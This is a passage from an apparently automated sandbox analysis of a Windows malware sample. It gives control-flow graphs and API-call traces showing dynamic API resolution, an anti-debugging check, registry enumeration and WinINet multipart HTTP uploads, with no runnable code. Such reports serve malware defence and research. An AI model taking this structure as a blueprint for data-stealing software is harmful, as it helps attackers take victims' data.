                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoSystemwsprintf
                                      • String ID:
                                      • API String ID: 2452939696-0
                                      • Opcode ID: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
                                      • Instruction ID: 08512fc152d1616d0ad9ea22e4a9698bc695f8d0908738fe214e90ce4e812d63
                                      • Opcode Fuzzy Hash: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
                                      • Instruction Fuzzy Hash: 67F06DB1E04218ABCB10CB84EC45FEAFBBDFB48B14F50066AF51592280E7796904CAE5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 752 419bb0-419bc4 call 419aa0 755 419de3-419e42 LoadLibraryA * 5 752->755 756 419bca-419dde call 419ad0 GetProcAddress * 21 752->756 758 419e44-419e58 GetProcAddress 755->758 759 419e5d-419e64 755->759 756->755 758->759 761 419e96-419e9d 759->761 762 419e66-419e91 GetProcAddress * 2 759->762 763 419eb8-419ebf 761->763 764 419e9f-419eb3 GetProcAddress 761->764 762->761 765 419ec1-419ed4 GetProcAddress 763->765 766 419ed9-419ee0 763->766 764->763 765->766 767 419f11-419f12 766->767 768 419ee2-419f0c GetProcAddress * 2 766->768 768->767
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,02E38E68), ref: 00419BF1
                                      • GetProcAddress.KERNEL32(74DD0000,02E38E50), ref: 00419C0A
                                      • GetProcAddress.KERNEL32(74DD0000,02E38E98), ref: 00419C22
                                      • GetProcAddress.KERNEL32(74DD0000,02E38E80), ref: 00419C3A
                                      • GetProcAddress.KERNEL32(74DD0000,02E38DD8), ref: 00419C53
                                      • GetProcAddress.KERNEL32(74DD0000,02EB05F8), ref: 00419C6B
                                      • GetProcAddress.KERNEL32(74DD0000,02E32668), ref: 00419C83
                                      • GetProcAddress.KERNEL32(74DD0000,02E32688), ref: 00419C9C
                                      • GetProcAddress.KERNEL32(74DD0000,02E38DF0), ref: 00419CB4
                                      • GetProcAddress.KERNEL32(74DD0000,02E38E08), ref: 00419CCC
                                      • GetProcAddress.KERNEL32(74DD0000,02E38E20), ref: 00419CE5
                                      • GetProcAddress.KERNEL32(74DD0000,02E38E38), ref: 00419CFD
                                      • GetProcAddress.KERNEL32(74DD0000,02E32568), ref: 00419D15
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1EF0), ref: 00419D2E
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1DB8), ref: 00419D46
                                      • GetProcAddress.KERNEL32(74DD0000,02E328A8), ref: 00419D5E
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1F20), ref: 00419D77
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1DD0), ref: 00419D8F
                                      • GetProcAddress.KERNEL32(74DD0000,02E32608), ref: 00419DA7
                                      • GetProcAddress.KERNEL32(74DD0000,02EB1F08), ref: 00419DC0
                                      • GetProcAddress.KERNEL32(74DD0000,02E32848), ref: 00419DD8
                                      • LoadLibraryA.KERNEL32(02EB1DE8,?,00416CA0), ref: 00419DEA
                                      • LoadLibraryA.KERNEL32(02EB1F50,?,00416CA0), ref: 00419DFB
                                      • LoadLibraryA.KERNEL32(02EB1D70,?,00416CA0), ref: 00419E0D
                                      • LoadLibraryA.KERNEL32(02EB1ED8,?,00416CA0), ref: 00419E1F
                                      • LoadLibraryA.KERNEL32(02EB1D40,?,00416CA0), ref: 00419E30
                                      • GetProcAddress.KERNEL32(75A70000,02EB1FB0), ref: 00419E52
                                      • GetProcAddress.KERNEL32(75290000,02EB1F38), ref: 00419E73
                                      • GetProcAddress.KERNEL32(75290000,02EB1E60), ref: 00419E8B
                                      • GetProcAddress.KERNEL32(75BD0000,02EB1E30), ref: 00419EAD
                                      • GetProcAddress.KERNEL32(75450000,02E32628), ref: 00419ECE
                                      • GetProcAddress.KERNEL32(76E90000,02EB0638), ref: 00419EEF
                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419F06
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00419EFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                      • Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
                                      • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                      • Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 769 405150-40527d call 41aab0 call 404800 call 419030 call 41ade0 lstrlenA call 41ade0 call 419030 call 41aa50 * 5 InternetOpenA StrCmpCA 792 405286-40528a 769->792 793 40527f 769->793 794 405290-4053a3 call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41ac30 call 41acc0 call 41abb0 call 41ab10 * 3 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 792->794 795 405914-4059a9 InternetCloseHandle call 418b20 * 2 call 41ad50 * 4 call 41aab0 call 41ab10 * 5 call 401550 call 41ab10 792->795 793->792 794->795 858 4053a9-4053b7 794->858 859 4053c5 858->859 860 4053b9-4053c3 858->860 861 4053cf-405401 HttpOpenRequestA 859->861 860->861 862 405907-40590e InternetCloseHandle 861->862 863 405407-405881 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ade0 lstrlenA call 41ade0 lstrlenA GetProcessHeap HeapAlloc call 41ade0 lstrlenA call 41ade0 memcpy call 41ade0 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 HttpSendRequestA call 418b20 861->863 862->795 1017 405886-4058b0 InternetReadFile 863->1017 1018 4058b2-4058b9 1017->1018 1019 4058bb-405901 InternetCloseHandle 1017->1019 1018->1019 1020 4058bd-4058fb call 41acc0 call 41abb0 call 41ab10 1018->1020 1019->862 1020->1017
                                      APIs
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                        • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                        • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                      • lstrlenA.KERNEL32(00000000), ref: 004051E3
                                        • Part of subcall function 00419030: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
                                      • StrCmpCA.SHLWAPI(?,02EB7320), ref: 00405275
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
                                      • HttpOpenRequestA.WININET(00000000,02EB7280,?,02EB6960,00000000,00000000,00400100,00000000), ref: 004053F4
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                      • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,02EB7290,00000000,?,02E34B20,00000000,?,00421B0C,00000000,?,0041541F), ref: 00405787
                                      • lstrlenA.KERNEL32(00000000), ref: 0040579B
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
                                      • HeapAlloc.KERNEL32(00000000), ref: 004057B3
                                      • lstrlenA.KERNEL32(00000000), ref: 004057C8
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 004057DF
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
                                      • memcpy.MSVCRT(?), ref: 00405806
                                      • lstrlenA.KERNEL32(00000000), ref: 00405818
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
                                      • memcpy.MSVCRT(?), ref: 00405841
                                      • lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
                                      • InternetCloseHandle.WININET(00000000), ref: 00405901
                                      • InternetCloseHandle.WININET(00000000), ref: 0040590E
                                      • InternetCloseHandle.WININET(00000000), ref: 00405918
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                      • String ID: ------$"$"$"$--$------$------$------
                                      • API String ID: 2744873387-2774362122
                                      • Opcode ID: a81d26ec91f96fbf8a05a8f5d715276f9c4e7b91fb0fb5aa956ae4b903f9e187
                                      • Instruction ID: 17d44de56e64bdd087ca749706e31b97a9426ac18b0a434e790be536538602ee
                                      • Opcode Fuzzy Hash: a81d26ec91f96fbf8a05a8f5d715276f9c4e7b91fb0fb5aa956ae4b903f9e187
                                      • Instruction Fuzzy Hash: 34321071A22118ABCB14EBA1DC65FEE7379BF54714F00419EF10662092EF387A98CF59

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1028 4048d0-404992 call 41aab0 call 404800 call 41aa50 * 5 InternetOpenA StrCmpCA 1043 404994 1028->1043 1044 40499b-40499f 1028->1044 1043->1044 1045 4049a5-404b1d call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 1044->1045 1046 404f1b-404f43 InternetCloseHandle call 41ade0 call 40a210 1044->1046 1045->1046 1132 404b23-404b27 1045->1132 1056 404f82-404ff2 call 418b20 * 2 call 41aab0 call 41ab10 * 8 1046->1056 1057 404f45-404f7d call 41ab30 call 41acc0 call 41abb0 call 41ab10 1046->1057 1057->1056 1133 404b35 1132->1133 1134 404b29-404b33 1132->1134 1135 404b3f-404b72 HttpOpenRequestA 1133->1135 1134->1135 1136 404b78-404e78 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41aa50 call 41ac30 * 2 call 41abb0 call 41ab10 * 2 call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA call 41ade0 HttpSendRequestA 1135->1136 1137 404f0e-404f15 InternetCloseHandle 1135->1137 1248 404e82-404eac InternetReadFile 1136->1248 1137->1046 1249 404eb7-404f09 InternetCloseHandle call 41ab10 1248->1249 1250 404eae-404eb5 1248->1250 1249->1137 1250->1249 1251 404eb9-404ef7 call 41acc0 call 41abb0 call 41ab10 1250->1251 1251->1248
                                      APIs
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                        • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                        • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
                                      • StrCmpCA.SHLWAPI(?,02EB7320), ref: 0040498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
                                      • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,02EB73C0), ref: 00404E38
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00404EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00404F15
                                      • HttpOpenRequestA.WININET(00000000,02EB7280,?,02EB6960,00000000,00000000,00400100,00000000), ref: 00404B65
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00404F1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 2402878923-2180234286
                                      • Opcode ID: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
                                      • Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
                                      • Opcode Fuzzy Hash: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
                                      • Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1260 4062d0-40635b call 41aab0 call 404800 call 41aa50 InternetOpenA StrCmpCA 1267 406364-406368 1260->1267 1268 40635d 1260->1268 1269 406559-406575 call 41aab0 call 41ab10 * 2 1267->1269 1270 40636e-406392 InternetConnectA 1267->1270 1268->1267 1289 406578-40657d 1269->1289 1272 406398-40639c 1270->1272 1273 40654f-406553 InternetCloseHandle 1270->1273 1274 4063aa 1272->1274 1275 40639e-4063a8 1272->1275 1273->1269 1277 4063b4-4063e2 HttpOpenRequestA 1274->1277 1275->1277 1279 406545-406549 InternetCloseHandle 1277->1279 1280 4063e8-4063ec 1277->1280 1279->1273 1282 406415-406455 HttpSendRequestA HttpQueryInfoA 1280->1282 1283 4063ee-40640f InternetSetOptionA 1280->1283 1285 406457-406477 call 41aa50 call 41ab10 * 2 1282->1285 1286 40647c-40649b call 418ad0 1282->1286 1283->1282 1285->1289 1293 406519-406539 call 41aa50 call 41ab10 * 2 1286->1293 1294 40649d-4064a4 1286->1294 1293->1289 1296 4064a6-4064d0 InternetReadFile 1294->1296 1297 406517-40653f InternetCloseHandle 1294->1297 1300 4064d2-4064d9 1296->1300 1301 4064db 1296->1301 1297->1279 1300->1301 1305 4064dd-406515 call 41acc0 call 41abb0 call 41ab10 1300->1305 1301->1297 1305->1296
                                      APIs
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                        • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                        • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                      • StrCmpCA.SHLWAPI(?,02EB7320), ref: 00406353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,02EB6960,00000000,00000000,00400100,00000000), ref: 004063D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
                                      • InternetCloseHandle.WININET(00000000), ref: 0040653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00406549
                                      • InternetCloseHandle.WININET(00000000), ref: 00406553
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$FUA$GET
                                      • API String ID: 3074848878-1334267432
                                      • Opcode ID: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
                                      • Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
                                      • Opcode Fuzzy Hash: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
                                      • Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • RegOpenKeyExA.KERNEL32(00000000,02EB3650,00000000,00020019,00000000,004205BE), ref: 00418534
                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                      • wsprintfA.USER32 ref: 004185E9
                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
                                      • Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
                                      • Opcode Fuzzy Hash: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
                                      • Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1369 415760-4157c7 call 415d20 call 41ab30 * 3 call 41aa50 * 4 1385 4157cc-4157d3 1369->1385 1386 4157d5-415806 call 41ab30 call 41aab0 call 401590 call 415440 1385->1386 1387 415827-41589c call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1385->1387 1403 41580b-415822 call 41abb0 call 41ab10 1386->1403 1413 4158e3-4158f9 call 41ade0 StrCmpCA 1387->1413 1417 41589e-4158de call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1387->1417 1403->1413 1418 415a2c-415a94 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1413->1418 1419 4158ff-415906 1413->1419 1417->1413 1549 415d13-415d16 1418->1549 1422 415a2a-415aaf call 41ade0 StrCmpCA 1419->1422 1423 41590c-415913 1419->1423 1442 415be1-415c49 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1422->1442 1443 415ab5-415abc 1422->1443 1427 415915-415969 call 41ab30 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1423->1427 1428 41596e-4159e3 call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1423->1428 1427->1422 1428->1422 1528 4159e5-415a25 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1428->1528 1442->1549 1449 415ac2-415ac9 1443->1449 1450 415bdf-415c64 call 41ade0 StrCmpCA 1443->1450 1458 415b23-415b98 call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1449->1458 1459 415acb-415b1e call 41ab30 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1449->1459 1479 415c66-415c71 Sleep 1450->1479 1480 415c78-415ce1 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1450->1480 1458->1450 1554 415b9a-415bda call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1458->1554 1459->1450 1479->1385 1480->1549 1528->1422 1554->1450
                                      APIs
